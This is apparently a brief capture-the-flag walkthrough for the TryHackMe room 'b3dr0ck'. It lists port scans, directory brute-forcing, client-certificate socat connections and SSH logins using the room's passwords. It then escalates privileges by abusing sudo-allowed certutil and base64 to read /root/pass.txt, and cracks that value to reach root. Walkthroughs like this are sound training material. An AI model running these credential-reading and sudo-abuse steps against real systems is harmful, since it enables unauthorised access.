b3dr0ck

Room Link: https://tryhackme.com/room/b3dr0ck

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Port 4040 & 54321 discovered

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

nmap -sC -sV -p- $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/4040 - HTTPS

TCP/9009 - HTTPS

TCP/54321 -

Kali

socat stdio ssl:$VICTIM:54321,cert=certficate,key=key,verify=0

TCP/22 - SSH

Kali

ssh barney@$VICTIM
Password: d1ad7c0a3805955a35eb260dab4180dd

Victim

sudo -l
sudo /usr/bin/certutil -a fred.csr.pem

TCP/54321 -

Kali

socat stdio ssl:$VICTIM:54321,cert=fred.certificate,key=fred.key,verify=0

TCP/22 - SSH

Kali

ssh fred@$VICTIM
Password: YabbaDabbaD0000!

Kali

sudo -l
sudo /usr/bin/base64 /root/pass.txt

CyberChef

CrackStation

su root
Password: flintstonesvitamins